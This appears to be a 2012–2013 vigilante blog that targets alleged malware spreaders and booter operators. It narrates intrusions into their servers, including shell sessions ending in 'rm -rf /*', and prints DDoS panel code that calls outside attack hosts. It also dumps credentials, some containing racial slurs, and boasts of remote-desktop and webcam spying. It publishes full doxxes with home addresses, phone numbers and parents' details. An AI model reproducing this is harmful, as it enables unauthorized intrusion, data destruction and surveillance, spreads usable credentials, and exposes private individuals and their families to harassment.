Thursday, March 14, 2013

Digital and the Case of the Incorporated Security Hosting Specialists Inc., LLC

This is all a placeholder for now. Will update with more information in the near future.

Chris "Digital" Gravenstein

Owner of incorporatedhosting.info, strike-file-hosting.us, hostingforcheap.info, hosting-security-specialists.com, cheapreliablehosting.info, and many more completely legitimate and professional hosting "companies"/botnet C&Cs.


root@vps105299# rm -rf /*
root@vps105299# kill -9 -1




Sounds legit

Thursday, December 13, 2012

Nyx Stresser


http://www.hackforums.net/showthread.php?tid=2899035

One of many shitty "booters". Took it down just now.



I'm not going to release the source because that would simply encourage skids to copy and paste it and make their own. Here's the core DoS logic though, from "hub.php":

@file_get_contents("http://atomicapi.net/send.php?key={$keyBoot}&host={$host}&port={$port}&time={$time}");

$select = mysql_query("SELECT * FROM shells WHERE status = 'up'");
//shells = "http://95.211.186.68/sudp.php", "http://178.18.19.122/sno.php"

while ($item = mysql_fetch_array($select)) {
    $ch = curl_init($item['url']."?act=phptools&type=".$type."&host=".$host."&time=".$time."&port=".$port);
}
So it uses the "atomic API" DDoS service plus two PHP DoS shells on cheap VPSs rented by the owner. Very sophisticated.

Here's the user table from the database. All password hashes are unsalted md5. Some already cracked. For the ones that I was too lazy to crack, try Googling the hash and you'll have a decent success rate.

Account Dump:
http://pastebay.net/1173575

Saturday, December 8, 2012

Nick Moses, botnet master

Daily / Nick Moses is at it again.


Ran the uninstall command for a good few hours.

It reached about 250 executions
He logged in and noticed, removed it, and changed all his passwords.

Ran the command again; he noticed once more. This time he changed the database password, fucking up his own Blackshades panel for quite a few hours before he realized what he did.

Nick Moses, intrusion prevention expert

Finally I got in a third time and made a small modification to Blackshades' command processing file that would silently run the uninstall command. That took out the rest of his Blackshades bots. Over the course of the week about 1300 bots were uninstalled.

Blackshades panel credentials:
micknoses:Nigger123:67.189.249.252
apoc:copa:74.36.162.180
define('DB_SERVER', "localhost");
define('DB_USER', "root");
define('DB_PASS', "Nigger123");
define('DB_DATABASE', "niggers");
$CFG_PASSWORD = "Nigger123";
daily500:nigger123456@pool.bitclockers.com:8332 //Bitcoin pool credentials for his bots
Top notch security.


He also had the same password stealer as last time ("Pieces of Eight"). Wiped about 8000 password captures.

Here was some of the shit on his server:
$ ssh root@daily-apoc.com
root@daily-apoc.com's password: 
[root@Daily-Apoc ~]# ls -al
total 153340
drwxr-x---  3 root root     4096 Dec  1 19:53 .
drwxr-xr-x 20 root  500     4096 Dec  1 15:25 ..
-rw-------  1 root root      728 Dec  1 19:53 .bash_history
-rw-r--r--  1 root root       24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root root      191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root root      176 Jan  6  2007 .bashrc
-rw-r--r--  1 root root      100 Jan  6  2007 .cshrc
-rw-r--r--  1 root root      129 Jan  6  2007 .tcshrc
-rw-r--r--  1 root root 84733045 Sep 30 20:31 xampp-linux-1.8.1.tar.gz
-rw-r--r--  1 root root 39143077 Sep 30 20:31 xampp-linux-devel-1.8.1.tar.gz
-rw-r--r--  1 root root 33103312 Sep 30 20:31 xampp-linux-upgrade-1.8.0-1.8.1.tar.gz
drwxr-xr-x  3 root root     4096 Sep 30 12:52 xampp-upgrade
[root@Daily-Apoc ~]# last -ai
root     pts/1        Sun Dec  2 13:15 - 16:27  (03:11)     67.189.249.252
root     pts/0        Sat Dec  1 15:34 - 19:53  (04:18)     174.127.99.221
reboot   system boot  Sat Dec  1 15:25          (13:57)     0.0.0.0
root     pts/1        Sun Apr  5 19:36 - 19:36  (00:00)     81.152.164.227
root     pts/0        Sun Apr  5 19:28 - down   (00:07)     81.152.164.227
reboot   system boot  Sun Apr  5 19:28          (00:07)     0.0.0.0
root     pts/0        Sun Apr  5 19:24 - down   (00:02)     81.152.164.227
reboot   system boot  Sun Apr  5 19:24          (00:02)     0.0.0.0

wtmp begins Sun Apr  5 19:23:49 2009
[root@Daily-Apoc ~]# ls -al /opt/lampp/htdocs/installation/ /opt/lampp/htdocs/update/
/opt/lampp/htdocs/installation/:
total 172
drwxr-xr-x 9 root   root  4096 Dec  1 16:45 .
drwxr-xr-x 6 nobody root  4096 Dec  2 00:49 ..
-rw-r--r-- 1 root   root  2000 Mar  2  2011 alive.php
-rw-r--r-- 1 root   root 10602 Mar  4  2011 bots.php
drwxr-xr-x 2 root   root  4096 Dec  1 16:42 classes
-rw-r--r-- 1 root   root 14907 Mar  4  2011 cmd.php
-rw-r--r-- 1 root   root   522 Dec  1 16:40 config.php
drwxr-xr-x 2 root   root  4096 Dec  1 16:42 db
-rw-r--r-- 1 root   root 12425 Mar  2  2011 dos.php
-rw-r--r-- 1 root   root  2502 Feb 28  2011 fg.php
-rw-r--r-- 1 root   root   978 Jan 14  2011 header.php
drwxr-xr-x 4 root   root  4096 Dec  1 16:44 img
-rw-r--r-- 1 root   root  2314 Jan 27  2011 index.php
-rw-r--r-- 1 root   root 12381 Mar  4  2011 install.php
-rw-r--r-- 1 root   root  1279 Dec 31  2010 logout.php
-rw-r--r-- 1 root   root  9018 Mar  4  2011 logs.php
-rw-r--r-- 1 root   root  6541 Mar  2  2011 main.php
drwxr-xr-x 2 root   root  4096 Dec  1 16:34 pieces
drwxr-xr-x 2 root   root  4096 Dec  1 16:45 plugins
-rw-r--r-- 1 root   root  9185 Feb 28  2011 pws.php
drwxr-xr-x 2 root   root  4096 Dec  1 16:45 screens
-rw-r--r-- 1 root   root  1127 Mar  2  2011 scr.php
-rw-r--r-- 1 root   root  7746 Jan 26  2011 settings.php
drwxr-xr-x 2 root   root  4096 Dec  1 16:45 webcam
-rw-r--r-- 1 root   root  6831 Mar  2  2011 webc.php

/opt/lampp/htdocs/update/: // CVE-2012-4681 Java driveby
total 28
drwxr-xr-x 3 root   root 4096 Dec  2 01:04 .
drwxr-xr-x 6 nobody root 4096 Dec  2 00:49 ..
-rw-r--r-- 1 root   root  915 Dec  1 21:34 Certificate.crt
drwxr-xr-x 2 root   root 4096 Dec  2 01:06 download
-rw-r--r-- 1 root   root  782 Dec  2 00:49 index.php
-rw-r--r-- 1 root   root  782 Dec  2 00:49 install.php
-rw-r--r-- 1 root   root 3150 Dec  1 21:34 java.jar

// Blackhole iframe injector, deobfuscated URL is hxxp://blackhole.twilightparadox.com/analytics/except/turn-engineer_charges_got.php

[root@Daily-Apoc ~]# cat /opt/lampp/htdocs/videos/index.php
<script>//long obfuscated code</script>

// and finally
[root@Daily-Apoc ~]# rm -rf /*


He also recently managed to independently become infected with some malware himself, causing a bit of public embarrassment on a popular malware forum: http://trojanforge.com/showthread.php?t=1425

lol
He wasn't too happy about this turn of events.




Sunday, December 2, 2012

"Suit"

For the first time, we have a "developer" here on the skid list. Indeed, a professional programmer of great prowess and ingenuity.

He goes by the name "Suit" (also "saywh4t" and others) on skidforums: http://www.hackforums.net/member.php?action=profile&uid=438020

At first glance, he appears to be a typical "bot herder," trojan spreader, and password thief. Dime a dozen.

Bot exchanging service

lol


What makes him stand out, though, are his endeavoring malware development projects:

Shitty advertisement


Another shitty advertisement


Truly revolutionizing the field of skidware. Do his claims hold any water, though? What gives his "products" a competitive edge?

Suit, otherwise known as Reece Chambers, did all of his development for s00tbot with webhosting from xhostfire.com; a now defunct web hosting service for skids.

I gently slipped a shell into his website's sandy beach and listened to its soft murmurs.

$ uname -a
Linux usa.xhostfire.com 2.6.18-274.18.1.el5.028stab098.1 #1 SMP Sat Feb 11 15:30:41 MSK 2012 i686 i686 i386 GNU/Linux
$ last -i
cunningp pts/0        130.216.30.121   Thu May 17 14:25 - 14:25  (00:00)
root     pts/0        70.95.123.70     Mon Apr 30 06:46 - down   (00:00)
sunnyval pts/0        174.56.103.168   Sun Apr  8 15:52 - 15:52  (00:00)
hackal   pts/0        46.99.251.19     Sun Apr  1 08:16 - 08:16  (00:00)
albini   pts/0        46.99.251.19     Sun Apr  1 08:15 - 08:15  (00:00)
socialen pts/0        96.44.101.216    Sat Mar 31 15:14 - 15:14  (00:00)
root     pts/0        85.76.123.168    Mon Mar 26 07:09 - down   (01:42)

$ ls -al ~/public_html/*

/home/cunningp/public_html/Website:
total 5672
drwxr-xr-x  7 cunningp cunningp    4096 May 23 02:43 .
drwxr-xr-x 12 cunningp nobody      4096 May 30 06:32 ..
-rw-r--r--  1 cunningp cunningp     220 Apr 25 17:42 .wysiwygPro_preview_339a5242a75565fc8cdd28b92e3ac846.php
drwxr-xr-x  2 cunningp cunningp    4096 May  2 22:34 Images
-rw-r--r--  1 cunningp cunningp 1419623 Apr 30 20:29 SecurityPanel(no_Install).zip
-rw-r--r--  1 cunningp cunningp 1406284 Apr 29 23:14 SecurityPanel.zip
drwxr-xr-x  2 cunningp cunningp    4096 Apr 17 18:43 SpryAssets
drwxr-xr-x  2 cunningp cunningp    4096 Apr 17 17:45 Templates
-rw-r--r--  1 cunningp cunningp    7741 May  3 22:01 about.php
-rw-r--r--  1 cunningp cunningp    2872 Apr 17 17:59 clients.html
-rw-r--r--  1 cunningp cunningp     923 Apr 26 23:04 clients.php
-rw-r--r--  1 cunningp cunningp    1682 May  1 21:02 config.php
-rw-r--r--  1 cunningp cunningp 2849380 May 30 16:39 error_log
-rw-r--r--  1 cunningp cunningp       0 May  1 20:48 gate.php
-rw-r--r--  1 cunningp cunningp     871 May  1 21:06 gatev2.php
-rw-r--r--  1 cunningp cunningp    1266 May  1 02:42 hidetest.php
drwxr-xr-x  2 cunningp cunningp    4096 May  4 08:08 include
-rw-r--r--  1 cunningp cunningp    2748 May  2 20:42 newClient.php
-rw-r--r--  1 cunningp cunningp    4137 May  2 21:43 newCommand.php
-rw-r--r--  1 cunningp cunningp    3274 May  2 20:32 newStat.php
-rw-r--r--  1 cunningp cunningp    2262 May  3 03:55 query.php
drwxr-xr-x  3 cunningp cunningp    4096 Apr 17 15:58 source
-rw-r--r--  1 cunningp cunningp    2133 Apr 23 01:37 statistics.html
-rw-r--r--  1 cunningp cunningp     751 Apr 25 20:38 stats.php
-rw-r--r--  1 cunningp cunningp    2459 Apr 27 02:55 style(original).css
-rw-r--r--  1 cunningp cunningp    4115 May  3 18:13 style.css
-rw-r--r--  1 cunningp cunningp    5372 May  2 19:28 test.php
-rw-r--r--  1 cunningp cunningp    2629 Apr 30 02:30 test2.php

[etc...]

$ ls -al /root              // root home dir is 777, lol
total 19416
-rw-r--r--  1 root root    10113 Mar  5 12:27       1
drwxrwxrwx 21 root root     4096 May 30 08:33 .
drwxr-xr-x 22 root root     4096 May 30 09:15 ..
-rw-------  1 root root      318 Apr 30 06:46 .bash_history
-rw-r--r--  1 root root       24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root root      191 Jan  6  2007 .bash_profile
[snip]
drwxr-xr-x  2 root root     4096 Mar 24 20:14 gott4
-rw-r--r--  1 root root    26065 Jan 29 02:20 gott4.zip
-rw-r--r--  1 root root    36358 Mar 24 20:04 index.html
-rw-r--r--  1 root root    30580 Mar 24 20:04 index.html?h=96f62342bc4f8f81944d259b6e0c153e&t=1332579809&f=92c4469c
-rwx------  1 root root     1067 Jan 10  2006 install.sh
-rw-r--r--  1 root root     1067 Jan 10  2006 install.sh.1
-rw-r--r--  1 root root     1067 Jan 10  2006 install.sh.2
drwxr-xr-x  2 root root     4096 Jan 17 18:25 public_ftp
drwxr-xr-x  3 root root     4096 Jan 17 18:25 public_html
-rw-r--r--  1 root root    12027 Mar 24 20:11 slow.pl
-rw-r--r--  1 root root     1286 Mar 24 20:06 syn.pl
drwxr-xr-x  3 root root     4096 May 30 02:41 tmp
-rwx------  1 root root      443 Jan 10  2006 uninstall.ddos
-rw-r--r--  1 root root      443 Jan 10  2006 uninstall.ddos.1
-rw-r--r--  1 root root      443 Jan 10  2006 uninstall.ddos.2



Here's some of his botnet panel code; his comments prefaced with "//", mine with "/*".

$hwid = ($_POST['hwid']);  //Collects hwid
...
$pc = ($_POST['pc']);    //Collects pc name
/* what ever would I do without those helpful comments */
$query = "INSERT INTO `".$sqlSettings['tableVisitorsList']."`";
$query .= "VALUES('', '$ipAddress', '$hwid', '$pc', '$os', '$status', '$country', '$mode', '', '$tStamp', '$tStamp', '', '')";
/* this looks perfectly safe */

He also made his own proprietary PHP "obfuscator" for distributing the source, which sadly enough I'm sure will still stop most script babbies.

function kEFFEX($NmkVE)
{
$NmkVE=gzinflate(base64_decode($NmkVE));
 for($i=0;$i<strlen($NmkVE);$i++)
 {
$NmkVE[$i] = chr(ord($NmkVE[$i])-1); /* this ain't your father's gzinflate base64decode...he subtracts 1 and renames some variables too! */
 }
 return $NmkVE;
 }eval(kEFFEX('longfuckingstring');

The binary itself is some shitty generic C#. Really making waves. Yawn.


Anyway, next I moved onto his Dropbox.

He put a very frightening legal notice inside his Dropbox folder:

DROPBOX EMPLOYEE'S PLEASE NOTE: All items in this folder are protected by the Digital Millennium Copyright Act,


Scanning, Decompiling, Executing, or Submitting these files to any entity without the expressed permission of Myself


is ILLEGAL and a VIOLATION of the DMCA laws and If you violate these laws we will contact our lawyers

I immediately stopped surveying the contents of the folder and DBAN'd my drive to avoid the risk of a lawsuit.

Since he foiled my plans to look at his Dropbox, I was about ready to throw my arms in the air and give up.

However, I got to thinking. His Dropbox was off-limits, but why not just remote into his desktop? I didn't see any mention of that in the DMCA warning. A loophole!

So I did, just to take a peek.

Just snapped a few brief shots. I certainly did not want to intrude!


Reece viewing his own botnet panel
Chatting with friends
Presumably transfering malware to another computer of his



I wanted to get a more personal look at Mr. Chambers. So much more can be conveyed in person than through cold, drab internet posts.

So, I sent an electromagnetic pulse to his webcam's lense and peered through it.

Hey, I can barely see you!
That's better.

So there're my observations of his programming abilities and top notch security safeguards.

Finally, here's a bit of info about Reece. All previously mentioned files, including his website and more goodies, are located at the bottom.

Suit/Hyphee/saywh4t (Reece Chambers)
http://www.hackforums.net/member.php?action=profile&uid=438020

Reece Chambers
10 Ngataringa Rd.
Devonport, Auckland
0624
New Zealand
Phone: 09-445 4496

Emails:

hyphee@windowslive.com (MSN)
saywh4t@gmail.com
subjective.suit@gmail.com
hyphee@gmail.com
r.hyphee@gmail.com

Facebook: http://www.facebook.com/reece.chambers.58
Stalker Facebook: http://www.facebook.com/profile.php?id=100002535412838
"crackhackforum" account: http://www.crackhackforum.com/user-26879.html
Skype: rsnoopyc

Usernames:

Suit
Hyphee
TheRealHyphee
saywh4t

Aliases:

George Tubby
George Phuey

Domains:

cunningpanda.com
xhpel.co.cc
youlaugh.co.cc
lots more

Files: http://www.mediafire.com/?zh65o6rc6ge6gz9
(may be flagged by AV due to his malware binaries)


A lot more blog updates coming soon.
Spread the word

Monday, November 5, 2012

SkypeLocus


http://www.hackforums.net/showthread.php?tid=2918767&pid=27842962#pid27842962


Some shitty free Skype resolver, for skids by skids. Had some gaping holes in it so I politely disabled its services.



It was running off a Windows box in the guy's house. Owner is from Denmark: http://www.ip-adress.com/ip_tracer/80.162.24.46

Looking at what's in his web root directory should provide all the evidence you need to see he is most certainly a skid (various botnet panels and live "booters").

> whoami
nt authority\system

> dir C:\Users\Server
 Volume in drive C has no label.
 Volume Serial Number is 4CD8-9BBC

 Directory of C:\Users\Server

09/22/2012  07:41 AM    <DIR>          .
09/22/2012  07:41 AM    <DIR>          ..
08/18/2012  02:46 PM    <DIR>          Contacts
10/27/2012  06:27 AM    <DIR>          Desktop
09/02/2012  11:31 AM    <DIR>          Documents
10/26/2012  12:47 PM    <DIR>          Downloads
08/18/2012  02:47 PM    <DIR>          Favorites
08/18/2012  02:46 PM    <DIR>          Links
08/18/2012  02:46 PM    <DIR>          Music
08/18/2012  02:46 PM    <DIR>          Pictures
08/18/2012  02:46 PM    <DIR>          Saved Games
09/03/2012  09:34 AM    <DIR>          Searches
08/18/2012  03:59 PM    <DIR>          temp
08/18/2012  02:46 PM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)  37,749,161,984 bytes free

> dir C:\Users\Server\Desktop
 Volume in drive C has no label.
 Volume Serial Number is 4CD8-9BBC

 Directory of C:\Users\Server\Desktop

10/27/2012  06:27 AM    <DIR>          .
10/27/2012  06:27 AM    <DIR>          ..
10/13/2012  07:44 AM             2,819 addshells.php
07/30/2012  10:39 PM    <DIR>          Autodeleter
10/01/2012  06:05 AM               110 banned-ips.txt
10/01/2012  06:05 AM               110 banned-players.txt
04/16/2011  09:44 PM             1,554 boatnet.sql
10/15/2012  03:40 PM         4,115,551 Cythisia Botnet v2.rar
01/26/2011  04:26 PM             4,801 dbprepare.sql
10/07/2012  03:30 AM           974,841 Desktop.rar
09/06/2012  11:42 PM            10,578 import.sql
09/14/2012  06:23 AM                70 index.php
09/06/2011  07:09 AM            41,085 legionbo_booter.sql
10/08/2012  07:37 AM         1,260,241 muffin man ragebooter.zip
10/01/2012  06:44 AM                11 ops.txt
03/03/2011  11:30 AM             4,135 phantacdb.sql
10/14/2012  05:22 PM    <DIR>          Phoenix Emulador 3.7.1
10/14/2012  04:43 PM    <DIR>          PhoenixPHP2.0.4
02/14/2011  02:19 PM             1,190 postbit_reputation.gif
10/02/2012  09:35 AM            22,476 server.log
10/01/2012  06:05 AM               511 server.properties
09/01/2012  12:32 AM    <DIR>          Skypestuff - Copy
10/10/2011  10:57 AM           179,200 VNBuilded.exe
06/20/2011  04:01 PM         1,654,784 VNBuilder.exe
10/01/2012  06:05 AM                 0 white-list.txt
10/02/2012  09:35 AM    <DIR>          world
10/02/2012  11:12 AM               623 XAMPP Control Panel.lnk
              20 File(s)      8,274,690 bytes
               7 Dir(s)  37,749,161,984 bytes free

> dir C:\xampp\htdocs
 Volume in drive C has no label.
 Volume Serial Number is 4CD8-9BBC

 Directory of C:\xampp\htdocs

10/26/2012  03:37 PM    <DIR>          .
10/26/2012  03:37 PM    <DIR>          ..
10/05/2012  05:34 AM             1,569 252939482935237498.php
10/31/2012  08:53 AM    <DIR>          51234213
10/06/2012  02:48 AM    <DIR>          Abstract
09/27/2012  11:02 AM                52 Accident.php
09/10/2012  05:39 PM            11,670 admin.php
10/19/2012  10:10 AM    <DIR>          Alex
09/14/2012  07:15 AM             1,793 Anonymous.php
10/31/2012  04:47 AM             1,942 APIresolve.php
09/10/2012  10:00 AM    <DIR>          assets
09/02/2012  12:30 AM                 6 banned.php
10/14/2012  05:16 AM    <DIR>          Blackout
10/09/2012  09:00 AM    <DIR>          blacks
10/05/2012  02:18 PM    <DIR>          boot
10/02/2012  10:07 AM    <DIR>          booter
10/05/2012  02:02 PM    <DIR>          bootz
10/15/2012  03:43 PM    <DIR>          botnn
09/27/2012  11:03 AM                52 brazzter.php
09/05/2012  09:44 AM               118 chatpost.php
09/27/2012  11:03 AM                52 CodingHoster.php
09/10/2012  10:00 AM               119 config.php
10/11/2012  06:07 PM    <DIR>          css
09/03/2012  10:47 AM               102 db.php
07/27/2012  07:11 PM             5,476 EdgeChecker.php
10/24/2012  01:27 PM    <DIR>          email
10/19/2012  01:03 PM             1,021 email.php
09/27/2012  11:03 AM                52 exe1.php
09/02/2012  11:26 AM             2,550 favicon.ico
10/25/2012  11:04 AM    <DIR>          form
10/25/2012  12:10 PM    <DIR>          forum
10/24/2012  07:28 AM    <DIR>          forums
10/30/2012  12:10 PM    <DIR>          Gantic
09/30/2012  11:50 AM               614 gethw.php
10/12/2012  02:52 PM             1,372 he.php
09/27/2012  10:31 AM               846 Here.php
09/27/2012  11:03 AM                52 hereisit.php
10/15/2012  10:16 AM    <DIR>          hotel
10/08/2012  10:24 AM                15 hwids.txt
09/27/2012  11:03 AM                52 ignace.php
10/02/2012  10:55 AM    <DIR>          images
09/09/2012  04:25 AM    <DIR>          includes
11/04/2012  06:15 AM                68 index.php
11/01/2012  01:59 AM         2,777,838 ips.html
11/04/2012  06:16 AM             3,774 login.php
09/09/2012  04:30 PM               142 logout.php
10/10/2012  07:27 AM    <DIR>          Loki Rat
10/24/2012  01:19 PM               342 mail.php
09/10/2012  05:41 PM             6,528 makeUser.php
09/27/2012  11:03 AM                52 MessiahSkypeLF.php
10/14/2012  10:47 AM               392 Multiboot.php
09/11/2012  05:05 AM                57 Myip.php
10/13/2012  07:19 AM    <DIR>          newboot
10/03/2012  01:26 PM             1,566 newphp.php
10/08/2012  10:31 AM                 7 Onlineornot.php
08/18/2012  05:37 PM    <DIR>          overlayinfo
09/10/2012  10:00 AM    <DIR>          plugins
09/27/2012  11:03 AM                52 PonyBlaze.php
10/14/2012  11:23 AM    <DIR>          power
09/10/2012  12:59 PM               304 pwCheck.php
09/10/2012  05:15 PM             6,881 register.php
10/11/2012  06:08 PM             2,442 Rename.php
09/01/2012  06:21 PM             2,663 Resolver - backup.php
11/04/2012  08:20 AM             2,484 resolver.php
09/14/2012  07:15 AM             1,793 Shockwave72.php
11/04/2012  08:20 PM    <DIR>          Skypehru
10/03/2012  01:56 PM                21 SkypelocaAPI.php
10/07/2012  11:10 AM    <DIR>          stea
10/01/2012  12:24 PM                64 Sunlight.php
09/02/2012  11:33 AM    <DIR>          templates
10/01/2012  12:23 PM                65 test.php
10/19/2012  01:04 PM             1,027 text.php
09/14/2012  07:15 AM             1,793 thefile.php
09/17/2012  01:58 AM                41 ThisistheAPI.php
10/13/2012  11:03 AM    <DIR>          Uploads
09/27/2012  11:04 AM                52 vanity.php
09/27/2012  11:04 AM                52 Vincent1468.php
10/13/2012  09:30 AM            15,366 web_ninja_zixem.php
08/20/2012  03:50 AM               263 Welcome.php
09/14/2012  07:16 AM             1,793 what.php
09/27/2012  11:04 AM                52 wildfire_FsKCheese.php
              51 File(s)      2,857,499 bytes
              30 Dir(s)  37,749,014,528 bytes free
              

> ipconfig

Windows IP Configuration


Wireless LAN adapter Wireless Network Connection:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::9145:d440:a419:b3d0%19
   IPv4 Address. . . . . . . . . . . : 192.168.0.15
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.0.1
   

> ping 192.168.0.1

Pinging 192.168.0.1 with 32 bytes of data:
Reply from 192.168.0.1: bytes=32 time=2ms TTL=64
Reply from 192.168.0.1: bytes=32 time=6ms TTL=64
Reply from 192.168.0.1: bytes=32 time=5ms TTL=64
Reply from 192.168.0.1: bytes=32 time=2ms TTL=64

Ping statistics for 192.168.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 2ms, Maximum = 6ms, Average = 3ms
    
// would take too much effort to fuck with his network; if it was Linux, maybe...

It had quite a lot of interesting shit on it. Databases, source code, and tons of other goodies. May release it at some later point.

Friday, September 7, 2012

"Daily"

Hey guys, sorry for the lack of updates. I've got a lot of content I'm gathering for a bunch of posts, but it'll take me some time to organize it all.

I just wanted to break the silence to make a brief post about a skid I found who goes by the name of Daily, aka Nick Moses.

Skidforums profile: http://www.hackforums.net/member.php?action=profile&uid=99678



He's apparently been one of the biggest 4chan malware spreaders, constantly spamming up all the boards with links to shitty Java drivebys and such. He's been doing this for years now, but he's ramped up his skid efforts in the past two months.

A few examples:

https://archive.installgentoo.net/g/thread/17666171 (2011)
https://archive.installgentoo.net/g/thread/27294499 (2012)
https://archive.installgentoo.net/g/thread/27279939 (2012)

He's even been getting into the hearts of weeaboos and redirecting them to Java drivebys (with some code he copied and pasted from 1 of 2,000 security blogs).

http://archive.foolz.us/jp/thread/9657436/#9657603

He also is apparently somewhat of a 4channer himself. Here's him attentionwhoring in an old moot sticky:


Just Google any of his domains, which I'm going to list towards the bottom, and you'll see tons and tons of 4chan hits. This is only a tiny sampling.

Seems he's mostly been spreading Blackshades lately, developed and sold by the fine gentlemen in the below blog post. After a few "issues" he's started only spreading DarkComet instead. But anyway, onto the fun stuff.


First, I found his Blackshades panel install, and graciously liberated him of his bots and logs to save him some money on bandwidth and hard drive space.

About 250 bots were uninstalled by the time it finished

I also found some kind of stolen password storage panel on his website mosesmusic.net. It's tied to some shitty VB password stealer.

Analysis: http://malwr.com/analysis/24a8aa62c2e2a5caffcd400552cb60e7/
Request: http://mosesmusic.net/backup/index.php?action=add&username=Me&password=DP7CM-PD6MC-6BKXT-M8JJ6-RPXGJ&app=Windows&pcname=LAB&sitename=Microsoft

I continued to be of assistance, and helped him free up a few megs (or however much it takes to store 16,000 passwords).

Password stealer panel



I went one step further and performed a "citizen's revokal" of all his domains, by order of acclaimed domain authority Meatspin Inc.

utilities.3utilities.com (used for RAT connections)
Logged into his Namecheap account
An order he made
Giving 67.55.108.167 some much needed traffic



I've got some more shit but I won't bore you with the details. I currently have all his domains, though he's trying to recover them and probably trying to register some new ones. When that happens I will be in talks with Namecheap.

Go hog wild.


Daily - Nick Moses

http://www.hackforums.net/member.php?action=profile&uid=99678

Nicholas (Nick) Moses
Age: 21

16 Water St
Orleans, VT 05860-1306
United States
(802) 754-1050

Parents' address (possibly old; above address may be their current one):

Jay Moses (Father) & Wanda Moses (Mother)
3258 Glen Rd
Newport, VT 05855-9043
United States
(802) 334-4522


Went to Champlain College in Vermont: http://www.champlain.edu

College dorm/apartment address as of 2010:

Nick Moses
Mailbox #663
Champlain College
P.O Box 670
Burlington, VT 05402


Associated IP Addresses:

71.80.41.168 - Used for malware hosting and bitcoins, appears residential, probably current home IP. Being used right now as DarkComet C&C. (ISP: Charter)
68.114.56.227 - Home IP, probably old (ISP: Charter)

94.249.213.172 - Previously hosted nickmoses.net
76.191.96.58 - Previously hosted mosesmusic.net
216.38.2.217 [utilities.3utilities.com] - VPS of some sort, used as a proxy (Provider: GigeNET)
216.38.8.176 [artemishost.no-ip.biz] - Another VPS, some malware he spreads connects back here; also has some recorded bitcoin transactions (Provider: GigeNET)
67.215.9.235 [apocalypsefree.in] - DarkComet hosting
91.236.116.105 [apocalypsefree.in] - DarkComet hosting
216.38.7.236 - no-ip.org DarkComet
184.82.139.23 - no-ip.org DarkComet
46.37.186.66 - no-ip.org DarkComet

Emails:

itsnickmoses@gmail.com
daily.middleman@gmail.com
dailydaily500@yahoo.com
black_daily500@yahoo.com
black_daily500@hotmail.com

MSN: dailyamcry@hotmail.com
AIM: dailydaily500
Skype: itsnickmoses
XBL: Daily500


Facebook: https://www.facebook.com/nickmoses
Archived Facebook info: http://profileengine.com/people/nickmoses/nick.moses

Google+: https://plus.google.com/104296121370055224470/
Myspace: http://www.myspace.com/coolmoses
Photobucket: http://s576.photobucket.com/profile/daily500
Formspring: http://www.formspring.me/itsnickmoses
Steam: http://steamcommunity.com/id/itsmemoses
Xfire: http://beta.xfire.com/profile/dailydaily500/
DeviantArt (lol): http://daily500.deviantart.com
Ebay: http://myworld.ebay.com/dailydaily500/
Chess.com: http://www.chess.com/members/view/daily500
Runescape Username: dailymage

Profiles owned by him presumably used for stalking or deception, possibly hacked accounts:

https://www.facebook.com/beth.davis.7712
http://www.myspace.com/242729140
http://www.myspace.com/330598988
http://www.bebo.com/PleaseSignIn.jsp?Page=c/profile&MemberId=1863201824


All usernames:

nickmoses
itsnickmoses
itsmemoses
Daily
daily500
dailydaily500
dailymage


Domains:

apocalypsefree.in
doomzco.com
slackforum.com
nickmoses.net
mosesmusic.net
dudeitscool.net
dudeitshosting.net
pagemake.org (Java drivebys)
teengirlslive.us (used for spreading Java drivebys, Google it and you'll see tons of 4chan threads)
teencamlive.net (spreading)
teencamzlive.us (spreading)
photos-at-90.org (expired)  

Nick Moses, hacker extraordinnaire


what I don't even

Monday, April 30, 2012

The skid list

This site's purpose is to publish information related to all sorts of script kiddies ("skids"). Trojan spreaders, botnet handlers, and more. Skids, their servers, their websites, their domains, their networks, and their facilitators are all fair game.

Stay tuned.